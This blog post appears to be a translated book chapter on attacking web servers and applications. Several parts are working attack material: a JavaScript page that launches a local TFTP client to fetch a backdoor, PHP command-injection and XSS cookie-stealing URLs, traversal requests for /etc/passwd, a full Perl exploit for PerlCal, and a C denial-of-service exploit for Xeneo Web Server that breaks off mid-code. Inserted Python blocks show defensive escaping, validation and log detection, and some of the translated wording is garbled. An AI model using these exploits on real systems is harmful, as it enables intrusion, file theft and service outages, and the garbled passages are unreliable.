Web Development and Exploitation

Posted by xiaoxiao, 2021-03-06

This chapter discusses the most common attacks we know of. Hackers exploit weaknesses in web services, and from only a few such weaknesses they often gain complete control. The most common web service weaknesses are found not only in Microsoft Internet Information Server (IIS) but also in Apache and in other web servers such as Sun ONE and Java application servers.

Hackers study the most widely used web servers, looking for remotely exploitable vulnerabilities that yield root or full login privileges. The reason is that once a remotely exploitable bug is found in widely deployed software, the hacker can run malicious code not on one host but on tens of thousands of machines.

The evolution of the web application

Today's Internet environment is a mixture of different technologies, protocols and operating systems spread across the globe. Through this mixture, applications are able to communicate with each other.

Web applications have enormous potential for users and developers, but they can also become a nightmare for security and system management. Most web servers implement some existing security practices and support applications built on top of them as a framework, but they are not independent of their platform. Most vendors and other developers write their own code to configure and extend web servers. This is why so many vulnerabilities are found in this code, leaving customers and system users open to attack.

Most web applications are continuously extended with more functionality and more features, which adds a lot of potential vulnerabilities to the code. Companies expect to use new technology to gain a competitive advantage, but they should have a security expert review this code before the product is sold to the public. This helps to reduce the chance of hackers finding remotely or locally exploitable bugs in the application. Most web attacks take place at the application layer; a hacker does not need extensive knowledge to obtain a login on a local network or on an individual system.

Table 1-1 is a short summary of typical web application technologies.

Table 1-1 Web application technologies

Vendor              Software technology
Sun Microsystems    Java 2 Enterprise Edition
BEA                 WebLogic
IBM                 WebSphere
Microsoft           JavaScript, ASP.NET, ISAPI, Component Object Model (COM), Active Server Pages (ASP)
Apache              Jakarta (server-side Java) and PHP
Generic             HTML, Perl and CGI

Evolution of Web Development

As web applications have developed, web attacks have developed alongside them. From simple directory listings to remotely exploitable buffer overflows, many companies work hard to secure their code, but hackers are constantly looking for new and more sophisticated ways to find bugs and exploit them.

Malicious objects: Java / ActiveX objects

Java and JavaScript

A Java object, or applet, is a small application written in Java, an object-oriented language from Sun Microsystems. It treats every element as an object. Java code is compiled into a file with the .class extension, which is stored on the web server; unlike other web client languages, its source code is not given away. Java is one of the most popular Internet development tools today, because it gives developers portable code that can be delivered over the Web.

In addition, hackers have targeted JavaScript as a way in. JavaScript is a scripting language that can be used in many server-side and client-side applications.

JavaScript is mainly used to accept user input and tie other components together. Most web browsers have a built-in JavaScript engine that accepts the plain JavaScript text and interprets it on the client side. Below is a very basic JavaScript example: it shows a pop-up box when a button is clicked.

Example: JavaScript popup box

<html>
<head>
<title>Basic JavaScript Example</title>
<script language="javascript">
<!-- hide from javascript-challenged browsers

function popup1()
{
    alert("Hello World!");
}

//-->
</script>
</head>
<body>
<h1 align="center">Basic JavaScript Example</h1>
<div align="center">
<form>
<input type="button" value="Hello World!" onclick="popup1()">
</form>
</div>
</body>
</html>

The example above is only meant to make you familiar with the language and to show you what to look out for when a web site is attacked.

Because JavaScript is executed on the client, a hacker can make an application output sensitive information by entering non-standard data that gets executed, or that causes the application to crash.

Below is an example of malicious JavaScript; it runs TFTP.exe on the client's local machine.

Example: Execute TFTP client

<html>
<head>
<title>Execute tftp.exe</title>
<script language="javascript">
<!-- hide from javascript-challenged browsers

var popup2 = window.createPopup();

function OpenPopup2()
{
    var popUpBody = popup2.document.body;
    popUpBody.innerHTML = '<OBJECT NAME="X" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="C:/Windows/system32/TFTP.exe"></OBJECT>';
    popup2.show(390, 290, 300, 300, document.body);
}

//-->
</script>
</head>
<body>
<p onclick="OpenPopup2();"><u><font color="#bbbbbb">TFTP</font></u></p>
</body>
</html>

With the code above, the TFTP (Trivial File Transfer Protocol) client is launched when the user clicks the "TFTP" link. Once TFTP is running, the client can download malicious code, such as a backdoor, so that the hacker gains full login permissions on the system.

ActiveX

Microsoft invented its own client scripting model, generally referred to as ActiveX. ActiveX is a by-product of the COM and OLE technologies. Unlike JavaScript, ActiveX has access to the operating system, which is why Microsoft developed a registration system, so that users can identify a control and run only ActiveX controls they have previously authorized.

Cross-Site Scripting

Cross-site scripting attacks are one of the most common security issues today. Most web sites now contain a lot of dynamic content to make the site more usable. Web applications assemble and deliver different types of output to users depending on the settings of their web browser. Dynamic web sites are not a threat in themselves; the threat called "cross-site scripting" arises when a web application collects sensitive or malicious data from one client and passes it on to another. Typically the data is included in a hyperlink containing malicious code, and the hacker gets a user to click that link in an e-mail, an instant message, a forum post, or a web site. Once the web application has collected the data, it generates a page containing it and sends that page to the user, who sees what looks like valid content from the correct site.

An example of a cross-site scripting attack: if a web site or web server does not check for script code and sends it back to the user's browser, fatal damage can result. Hackers can use cross-site scripting weaknesses to obtain a user's cookies, login details and other sensitive information. Several products have suffered cross-site scripting attacks that allow hackers to use Java servlet containers to send back malicious JavaScript code.
This allows hackers to construct cross-site scripting attacks in which users receive malicious script code from a server they trust. A number of older web servers were easily affected by cross-site scripting attacks:

Resin 1.2.2: http://www.targeted_host/<script>alert(document.cookie)</script>.jsp

WebSphere 3.02: http://www.targeted_host/<script>alert(document.cookie)</script>.jsp

JRun 3.0: http://www.targeted_host/<script>alert(document.cookie)</script>.shtml

These pages will produce the following output:

Message: file: file://
stacktrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File Not Found: file://******
    at javax.servlet.ServletException.<init>(ServletException.java:107)
    at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
    at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
    at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)

Cookie manipulation

Cookie manipulation is a form of attack in which the hacker modifies data passed between the client and the web application that the application never intended the user to change directly. This form of attack can be carried out on URL strings, cookies and form fields. It is the well-known man-in-the-middle style of attack. Cookies are mainly used to store user data and parameters and to carry tokens. Most cookies can be modified by the user and sent back to the server with a different request, and there are completely free tools for doing this. Most cookies are used for session tokens or for a range of values on which authentication decisions are made.

About 90% of cookies are base64 encoded. Below is a basic example of an HTTP header a browser receives.

Example: Set-Cookie

Set-Cookie: varUserName=c0nnie;&varUserID=TF7044959; Expires=Thu, 19 July 2010 20:00:00 GMT; Path=/; Domain=.security-protocols.com

The browser interprets this as a command and stores the cookie for this site. From then on, whenever the browser requests a page from the server, it includes the cookie as additional data in the HTTP header. Here is an example of the HTTP header sent back to the web application once the user has logged in.

Cookie: varUserName=c0nnie;&varUserID=TF7044959

As you can see from this example, the cookie is used to keep a record of our login ID. This is also why, when you delete all the cookies from your local machine, you are usually logged out. A cookie is plain text sent back to the server, so clearly it is easy to change. Now think about what a hacker could get by manipulating a cookie.

This cookie example is very straightforward and easy to use; as you can see, the user ID value is what we should try to change. Once I changed its value, I got a "Welcome Phil" message from the server on the next request. It seems we have taken over the login of another user. So you are probably wondering how the web application knew that user ID TF7044959 was Phil. Phil was not logged in to our site, so the mapping must have been stored in the system in a database.

Techniques for finding and exploiting vulnerabilities

Web servers have always been the easiest way for a hacker to get into an internal network, or just to compromise systems exposed on the Internet. As we said at the beginning of this chapter, web applications are normally coded as fast as possible and the thought of coding securely never enters the programmers' minds. There are numerous ways of finding vulnerabilities in web servers.
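The cross-site scripting and cookie manipulation sections above turn on the same object: the reflected request path in the servlet error page is what carries the script, document.cookie is what that script steals, and the varUserID value is what gets tampered with. The following Python is an added example, not code from the original chapter, showing the two server-side counters: HTML-escaping anything reflected into an error page, and issuing the session cookie with an HMAC signature plus the HttpOnly and Secure attributes. SERVER_KEY, not_found_page, set_cookie_header and verify_cookie are names assumed for this example; the user name and ID are the ones from the chapter's Set-Cookie example.

```python
import hashlib
import hmac
import html

# Constructed server-side secret for the example; a real deployment loads it
# from a key store and rotates it, it never sits in source.
SERVER_KEY = b"example-key-for-the-chapter-demo"


def not_found_page(requested_path: str) -> str:
    """Error page for a missing file, in the spirit of the servlet container
    output shown above, but with the reflected path HTML-escaped so that a
    <script> tag in the request is displayed as text instead of executed."""
    safe_path = html.escape(requested_path, quote=True)
    return (
        "<html><body><h1>File Not Found</h1>"
        f"<p>The requested resource {safe_path} does not exist.</p>"
        "</body></html>"
    )


def _mac(value: str) -> str:
    """HMAC-SHA256 of the cookie payload under the server key."""
    return hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()


def set_cookie_header(user_name: str, user_id: str) -> str:
    """Build a Set-Cookie header carrying the same two fields as the chapter's
    example, but signed, marked HttpOnly (unreadable from document.cookie)
    and Secure (sent only over TLS)."""
    payload = f"varUserName={user_name}&varUserID={user_id}"
    return f"Set-Cookie: session={payload}.{_mac(payload)}; Path=/; HttpOnly; Secure"


def verify_cookie(cookie_value: str):
    """Return (user_name, user_id) if the cookie is intact, None if it was
    altered or is malformed. The user ID is trusted only after the MAC checks."""
    payload, dot, mac = cookie_value.rpartition(".")
    if not dot:
        return None
    if not hmac.compare_digest(mac, _mac(payload)):
        return None
    fields = dict(part.split("=", 1) for part in payload.split("&"))
    return fields.get("varUserName"), fields.get("varUserID")
```

Base64 encoding, which the chapter notes most cookies use, hides nothing from the user who holds the cookie: the signature is what makes a modified varUserID detectable on the server, and HttpOnly is what keeps a script that does get injected from reading the value in the first place.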
The next few sections give examples of common fingerprints used in the exploitation of both web servers and web applications.

Basic exploitation techniques

'<?' method

The '<?' method can be used to insert PHP into a remote web application. It is possible to execute arbitrary commands on a remote server using this technique. Below is an example of how it can be used.

Example: <?

http://target_host/webapp.php=<? passthru("id"); ?>

On some PHP applications, this may allow the command to be executed locally on the remote host under the user the web server is running as.

';' method

The ';' character allows multiple commands to be executed on Unix or Linux machines.

Example: ';'

[root@c0nnie]# id; uname -a
uid=0(root) gid=0(root) groups=0(root)
Linux c0nnie 2.4.19-16mdk #1 Fri Sep 20 18:15:05 CEST 2002 i686 unknown unknown GNU/Linux

This technique is offensive.

'|' method

The pipe character is offensive.

Example: '|'

http://target_host/foobar.pl?page=../../../../bin/ls%20-al%20/home|

The request above will give a full directory listing of the 'home' directory on the targeted host.

'%00' method

Example: '%00'

http://target_host/foobar.pl?page=../../../../etc/passwd

When this request is made, the web application disallows it, because it checks for a valid file name ending in .asp, .html or some other file extension.

http://target_host/foobar.pl?page=../../../etc/passwd%00html

With this request, it tricks the web application into thinking that the file name ends in one of its file types. This is a very common problem in web applications.

'%20' method

Example: '%20'

http://target_host/foobar.pl?page=uname%20-a|

The example above outputs the result of the 'uname -a' command on a UNIX or Linux system. This may allow an attacker to see what type of operating system the host is running. The method can also be used with other variations of the attacker's choice.

Directory traversal vulnerabilities

A directory traversal occurs when a web application or web server does not filter out bad characters sent by a hacker. A hacker can send a bad request resulting in the disclosure of directories and files outside the normal bounds of the HTTP root directory.

PerlCal cal_make.pl directory traversal

Back in April 2001 a guy by the name of Stan, aka The Pike, found a directory traversal in PerlCal's cal_make.pl. PerlCal is a web scheduler/calendar server managed by CGI scripts. This particular vulnerability allows anyone to download any file on the local system. Below is an example HTTP request to do so.

Example: 'cal_make.pl'

http://target_host/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../../../../../../../../../etc/passwd

The request above retrieves the local system passwd file, which contains all the user accounts on the system. If this is an older system, the passwd file may not be shadowed, making it easy to crack. I coded a very simple exploit for this vulnerability below.

PerlCal cal_make.pl exploit

#!/usr/bin/perl
# PerlCal cal_make.pl Directory Traversal
# This vuln was found by: Stan aka ThePike
#
# Vulnerable systems:
# PerlCal version 2.95 and prior (UNIX)
#
# Written by Tommy <tommy@security-protocols.com>
# for security-protocols research labs
# 09/09/02
#
# usage:
# perl sp-perlcal.pl targeted_host /etc/passwd or /proc/version
#
#
#################

use IO::Socket;
use strict;

print "-" x 74;
print "\nPerlCal cal_make.pl Directory Traversal, tommy\@security-protocols.com\n";
print "-" x 74;
print "\n\n";

my $host = $ARGV[0];
my $port = 80;
my $fuxor = "/etc/passwd%00";
my $lin;
my @thedata;

# second argument, if given, is the file to fetch
($ARGV[1]) && ($fuxor = $ARGV[1] . "%00");

print "W0rking on getting $fuxor from $host\n";

my $tcpval = getprotobyname('tcp');
my $serverip = inet_aton($host);
my $serveraddr = sockaddr_in(80, $serverip);
my $protocol_name = "tcp";

my $iaddr = inet_aton($host) || die print("Host was not found: $host");
my $paddr = sockaddr_in($port, $iaddr) || die print("You did something wrong stupid... exiting...");
my $proto = getprotobyname('tcp') || die print("Cannot get protocol");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die print("Socket could not open: $!");
connect(SOCK, $paddr) || die print("Cannot connect: $!");

my $submit = "GET /cgi-bin/cal_make.pl?p0=../../../../../..$fuxor\n\n";
send(SOCK, $submit, 0);
@thedata = <SOCK>;

close(SOCK);

foreach $lin (@thedata)
{
    print "$lin";
}

print "\n------------------------------- EOF -------------------------------\n\n";

Web server and web application vulnerability scanning software

In this section we present some tools that can be used to identify web server software vulnerabilities.
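Before looking at the scanners, one more word on the techniques just covered. Every one of them, and the cal_make.pl traversal, comes down to a parameter that the script passed to the file system or to a shell without checking it after decoding. The following Python is an added example, not part of the original chapter, of the check that foobar.pl or cal_make.pl should have applied to its page parameter: decode once, reject NUL bytes and shell metacharacters, check the extension on the decoded value, and confirm the resolved path stays under the web root. WEB_ROOT, ALLOWED_EXTENSIONS and check_page_parameter are names and values assumed for this example.

```python
import posixpath
import re
from urllib.parse import unquote

# Web root the application is allowed to serve from (constructed for the example).
WEB_ROOT = "/var/www/html"
ALLOWED_EXTENSIONS = (".html", ".htm", ".asp")
# Characters that would let the value reach a shell as several commands or a pipeline.
SHELL_METACHARS = re.compile(r"[;|&`$<>\n]")


def check_page_parameter(raw_value: str):
    """Validate a 'page' query parameter.

    Returns (None, reason) when the value is rejected, or (absolute_path, None)
    when it is safe to open. Every check runs on the decoded value, because
    %00, %20 and the rest only mean something once the server has decoded them.
    Decode exactly once, the same number of times the server itself does."""
    value = unquote(raw_value)

    # '%00' method: a NUL byte terminates C strings, so ".../etc/passwd%00html"
    # passes a naive extension check but opens /etc/passwd. Reject it outright.
    if "\x00" in value:
        return None, "null byte in parameter"

    # ';' and '|' methods: anything that could turn one command line into several.
    if SHELL_METACHARS.search(value):
        return None, "shell metacharacter in parameter"

    # Extension check after decoding and after the NUL check, not before.
    if not value.lower().endswith(ALLOWED_EXTENSIONS):
        return None, "extension not allowed"

    # Directory traversal: normalise the path and require it to stay under WEB_ROOT.
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, value.lstrip("/")))
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None, "path escapes web root"

    return candidate, None
```

The order matters: an extension check is useless before the NUL byte is rejected, which is exactly why passwd%00html got through, and the root check has to run on the normalised path, since a plain substring search for ../ misses encoded and mixed forms.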
We have used and evaluated almost all web server vulnerability scanners, and the following seem to be the best to use.

Nikto

Nikto is a web server vulnerability scanner written by Chris Sullo. Nikto performs comprehensive testing against web servers for multiple vulnerabilities, including misconfigurations, insecure or default files and scripts, and over 130 versions of servers. We feel that this is the best free web server scanner available. Nikto uses RFP's LibWhisker as a base for all socket functionality. Some of Nikto's main features are multiple IDS evasion techniques, SSL support, and Perl plug-in support.

Nikto has so many checks, and can scan so fast, that it will overwhelm smaller web servers, and it will definitely be seen in intrusion detection logs and web server logs. There is an IDS evasion option which can be used. The best thing about this tool is that you can code your own checks.

Whisker

The long-anticipated version 2.1 of Whisker has been released. Whisker is a very robust scanning tool. The main function of Whisker is to scan remote web servers for files. Whisker was introduced in the early days, when most bugs were associated with CGI scripts with known exploitable vulnerabilities. Below we demonstrate how Whisker works. Please note that Whisker is a Perl script, so make sure you have Perl installed.

Whisker comes with a set of database files which the scan engine takes as its primary configuration. The included database files tell Whisker what directories to look for, what files to look for, and a few other things such as how web servers react to certain requests.
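The Nikto paragraph above notes that a scanner will definitely show up in web server logs. The following Python is an added example, not part of the original chapter or of either tool, of what that looks like from the defender's side: it parses a few constructed Apache-style access log lines and flags a client by a scanner user-agent string, a directory-traversal probe, or a burst of 404 responses inside a short window, which is what a database-driven file scan like Whisker's produces. SAMPLE_LOG, LOG_RE, parse_line and find_scanners are constructed for this example; the user-agent strings and request paths are made up to resemble a scan and are not captured from either tool.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed access-log lines in Apache combined format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2003:10:00:01 +0000] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)"
10.0.0.9 - - [12/Apr/2003:10:00:02 +0000] "GET /cgi-bin/count.cgi HTTP/1.1" 404 210 "-" "Mozilla/4.75 (Nikto/1.23)"
10.0.0.9 - - [12/Apr/2003:10:00:02 +0000] "GET /siteserver/publishing/viewcode.asp HTTP/1.1" 404 210 "-" "Mozilla/4.75 (Nikto/1.23)"
10.0.0.9 - - [12/Apr/2003:10:00:03 +0000] "GET /cgi-bin/cal_make.pl?p0=../../etc/passwd HTTP/1.1" 404 210 "-" "Mozilla/4.75 (Nikto/1.23)"
10.0.0.9 - - [12/Apr/2003:10:00:03 +0000] "GET /scripts/viewcode.asp HTTP/1.1" 404 210 "-" "Mozilla/4.75 (Nikto/1.23)"
10.0.0.9 - - [12/Apr/2003:10:00:04 +0000] "GET /_vti_bin/shtml.exe HTTP/1.1" 404 210 "-" "Mozilla/4.75 (Nikto/1.23)"
10.0.0.9 - - [12/Apr/2003:10:00:04 +0000] "OPTIONS / HTTP/1.1" 200 0 "-" "Mozilla/4.75 (Nikto/1.23)"
10.0.0.5 - - [12/Apr/2003:10:00:07 +0000] "GET /missing.html HTTP/1.1" 404 210 "-" "Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Scanner names that identify themselves in the User-Agent (assumed list).
SCANNER_UA = re.compile(r"nikto|whisker|libwhisker", re.I)


def parse_line(line: str):
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["time"] = datetime.strptime(event["ts"], "%d/%b/%Y:%H:%M:%S %z")
    event["status"] = int(event["status"])
    return event


def find_scanners(log_text: str, window_seconds: int = 60, threshold: int = 4):
    """Return {ip: [reasons]} for clients whose traffic looks like a scanner."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    reasons = defaultdict(set)
    not_found = defaultdict(list)  # ip -> timestamps of recent 404 responses
    for e in events:
        if SCANNER_UA.search(e["ua"]):
            reasons[e["ip"]].add("scanner user-agent")
        if "../" in e["path"] or "%2e%2e" in e["path"].lower():
            reasons[e["ip"]].add("directory traversal probe")
        if e["status"] == 404:
            times = not_found[e["ip"]]
            times.append(e["time"])
            # Sliding window: forget 404s older than window_seconds.
            while times and e["time"] - times[0] > timedelta(seconds=window_seconds):
                times.pop(0)
            if len(times) >= threshold:
                reasons[e["ip"]].add("404 burst")
    return {ip: sorted(r) for ip, r in reasons.items()}
```

The user-agent rule is the cheapest and the least reliable, since Nikto's evasion option and a one-line change in any scanner remove it; the 404 burst and the traversal pattern are properties of the scan itself and survive a renamed client.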
Here is how to run Whisker against a host:

[tf0ne@c0nnie tf0ne]$ perl whisker.pl -h http://target_host.com/

-----------------------------------------------------------------------

Title: Notice

Whisker scans for CGIs by checking to see if the server says a particular URL exists. However, just because a URL exists does not necessarily mean it is vulnerable/exploitable. The vulnerability might be limited to only a certain version of the CGI, and the server might not be using the vulnerable version. There is also the case where many scripts use the same generic CGI name (like count.cgi); in this case, the exact CGI being used may not be the same one that contains the vulnerability.

Thus, the actual vulnerability of the CGI must be verified in order to get a true assessment of risk. Whisker only helps in pointing out the problem areas. The next step after scanning with whisker is to review each found CGI by reviewing the reference URLs or searching for the CGI name on securityfocus.com or google.com.

-----------------------------------------------------------------------

Beginning scan against http://www.target_host.com

-----------------------------------------------------------------------

Whisker is currently crawling the website; please be patient.

-----------------------------------------------------------------------

Title: Server Banner
Id: 100
Severity: Informational

The server returned the following banner: Microsoft-IIS/5.0

-----------------------------------------------------------------------

Whisker is done crawling the website.

-----------------------------------------------------------------------

Title: Server Banner
Id: 100
Severity: Informational

The server returned the following banner: Microsoft-IIS/5.0

-----------------------------------------------------------------------

Title: Server Options Results
Id: 109
Severity: Informational

The server responded to an OPTIONS query with the following public methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
The allowed methods for '/' are: OPTIONS, TRACE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

-----------------------------------------------------------------------

Title: Server Patch Level
Id: 111
Severity: Informational

Testing indicates server patch level to be at or after the following level: Win2k IIS-SRP1 (MS02-018) or SP3

-----------------------------------------------------------------------

Title: viewcode.asp
Id: 621
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledge/membership/inspired/viewcode.asp

No specific information is provided for this item.

References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736

-----------------------------------------------------------------------

Title: viewcode.asp
Id: 622
Bid: 167
Cve: 1999-0736
Found URL: /sites/samples/knowledtuture/ViewCode.asp

No specific information is provided for this item.

References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736

-----------------------------------------------------------------------

Title: viewcode.asp
Id: 624
Bid: 167
Cve: 1999-0736
Found URL: /sites/sample/knowledge/push/viewcode.asp

No specific information is provided for this item.

References:
http://online.securityfocus.com/bid/167
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0736

-----------------------------------------------------------------------

Title: viewcode.asp
Id: 627
Found URL: /siteserver/publishing/viewcode.asp

No specific information is provided for this item.

-----------------------------------------------------------------------

Title: Encountered Cookies
Severity: Informational

The following cookies were encountered while scanning: ASPSESSIONIDSCQADDSA=PokeccccjfeMDBHMKLFIG; path=/

-----------------------------------------------------------------------

Whisker scan completed in 1 minute.

Looking over the output, Whisker has found several potentially exploitable files and directories on this Microsoft IIS 5.0 system. The nice thing about Whisker 2.1 is that it provides URL links and detailed information on the files it has found. Whisker is a very powerful tool.

Shadow Security Scanner

One of the newer and very impressive vulnerability scanners is Shadow Security Scanner by Safety Lab. This is not just a web server scanner but a full-fledged vulnerability scanner. The latest version as of this writing is SSS 5.41.

Shadow Security Scanner was designed to identify known vulnerabilities, suggest fixes for the vulnerabilities it identifies, and also report other security holes within the network. Shadow Security Scanner has very flexible policies on which audits to perform. There is a nice policy wizard which helps you select exactly which ports you wish to scan.

Figure 1-1 Shadow Security Scanner

The reports produced after a scan are very detailed, which makes it easy for any user to read them and act on the vulnerabilities found within their network. Shadow Security Scanner has a very nice auto-update feature which allows you to update the scan modules on a daily basis. Although this tool is not free, it is definitely worth a try if you are looking for a robust tool.

Blindly fuzzing web servers for vulnerabilities

I have had a lot of success fuzzing web servers and other applications for bugs. There are a few really good fuzzer tools out there. From my experience, SPIKE, written by Dave Aitel, has found numerous remotely exploitable bugs.

SPIKE

SPIKE is an API and a set of test tools that let you quickly model a network protocol; SPIKE can replicate any complex binary protocol. The coolest thing is that you can test old techniques on new products. For most web applications, SPIKE can quickly discover buffer overflows, SQL injection bugs and format string bugs. There are many advantages to using SPIKE's framework over using Perl scripts. SPIKE integrates very well with libntlm and other GPL'ed libraries for doing encryption and other things for which you do not have Perl modules.

SPIKE programs for web applications

· generic_web_server_fuzz
· closed_source_web_server_fuzzer
· webfuzz.c
· webmitm
· ntlm2 / ntlm_brute

Below I will show you how to run SPIKE using the closed_source_web_server_fuzz program against Xeneo Web Server 2.2.2.10.0. Let's see what we find!
[tf0ne@c0nnie src]$ ./closed_source_web_server_fuzz 192.168.1.103 80 GET /index.html 0 0

After about an hour of fuzzing, the closed_source_web_server_fuzz program segfaulted (meaning that it found a bug). After looking over the output from SPIKE, I found that the following GET request crashed the web server:

GET /index.html?testvariable=gif HTTP/1.1
Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Cookie: VARIABLE=SPLABS; path=/
User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)
Variable: result
Host: localhost
Content-Length: 513
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Now that we have a malicious packet, we can easily write exploit code that reproduces this vulnerability.

Xeneo Web Server 2.2.2.10.0 DoS exploit

/* Xeneo Web Server 2.2.2.10.0 DoS
 *
 * Vulnerable systems:
 * Xeneo Web Server 2.2.10.0
 * Vendor:
 * http://www.northernsolutions.com
 *
 * Written and found by Tommy <tommy@security-protocols.com>
 * for sp research labs
 * 04/23/2003
 *
 * www.security-protocols.com
 *
 * usage:
 * sp-xneo2 <targetip> [targetport] (default is 80)
 */

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

/* the request that crashed the server during fuzzing, replayed verbatim */
char exploit[] =

"GET /index.html?testvariable=&nextTestVariable=gif HTTP/1.1\r\n"
"Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%"
"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Connection: Keep-Alive\r\n"
"Cookie: VARIABLE=SPLABS; path=/\r\n"
"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)\r\n"
"Variable: result\r\n"
"Host: localhost\r\n"
"Content-Length: 513\r\n"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\r\n"
"Accept-Encoding: gzip\r\n"
"Accept-Language: en\r\n"
"Accept-Charset: iso-8859-1,*,utf-8\r\n\r\n\r\n"
"whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WORD wVersionRequested;
    struct hostent *pTarget;
    struct sockaddr_in sock;
    char *target, buffer[30000];
    int port, bufsize;
    SOCKET mysocket;

    if (argc < 2)
    {
